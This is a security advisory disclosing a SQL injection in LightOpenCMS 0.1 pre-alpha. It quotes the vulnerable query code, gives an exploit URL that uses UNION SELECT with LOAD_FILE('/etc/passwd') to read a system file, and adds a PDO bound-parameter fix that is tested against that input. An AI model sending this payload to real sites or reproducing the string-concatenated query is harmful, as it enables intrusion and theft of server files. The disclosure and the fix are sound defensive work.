LightOpenCMS 0.1 pre-alpha Remote SQL Injection

From: Salvatore "drosophila" Fresta <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>,str0ke <milw0rm@gmail.com>
Cc:
Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
Date:

Attachments:
LightOpenCMS 0.1 pre-alpha Remote SQL Injection-05062009.txt

********   Salvatore "drosophila" Fresta   ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statements.

...

if (isset($_GET['id'])) {
            $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
            return mysql_fetch_assoc($result);

...


***************************************************

[+] Code


- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23


***************************************************

[+] Fix

No fix.


***************************************************

-- 
Salvatore Fresta aka drosophila
CWNP444351
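
Added example (not part of the original advisory and not LightOpenCMS code): one way to write the lookup quoted from dbc.php so that the id parameter cannot alter the query, shown against the id value from the advisory's request. Assumptions: PHP 7.1+ with PDO and pdo_sqlite; an in-memory SQLite database stands in for MySQL so the script runs offline; the function name get_page and the table columns are hypothetical.

```php
<?php
// Added example, not LightOpenCMS code. SQLite in memory stands in for the
// MySQL backend so the script runs offline; the table row is constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)");
$db->exec("INSERT INTO pages VALUES (1, 'Home', 'Welcome', 'admin')");

/**
 * Hypothetical replacement for the lookup quoted from dbc.php.
 * Returns the page row, or null when the id is invalid or unknown.
 */
function get_page(PDO $db, $rawId): ?array
{
    // 1. Allow-list: the id must be a short, plain decimal string.
    //    Arrays (?id[]=1), signs, quotes and whitespace are rejected.
    //    /D stops "$" from matching before a trailing newline.
    if (!is_string($rawId) || !preg_match('/^[0-9]{1,9}$/D', $rawId)) {
        return null;
    }
    // 2. Bound parameter: the value travels separately from the SQL text,
    //    so it cannot change the statement's structure, regardless of the
    //    magic_quotes_gpc setting the advisory lists as a requisite.
    $stmt = $db->prepare('SELECT * FROM pages WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The id value from the advisory's request, URL-decoded (%23 is '#').
$advisoryId = "-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4#";

var_dump(get_page($db, '1'));          // a legitimate id
var_dump(get_page($db, $advisoryId));  // the advisory's input
var_dump(get_page($db, ['1']));        // array input, as sent by ?id[]=1
```

Either measure alone closes this injection; the bound parameter is the one that keeps working if the id format later changes to something other than an integer.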
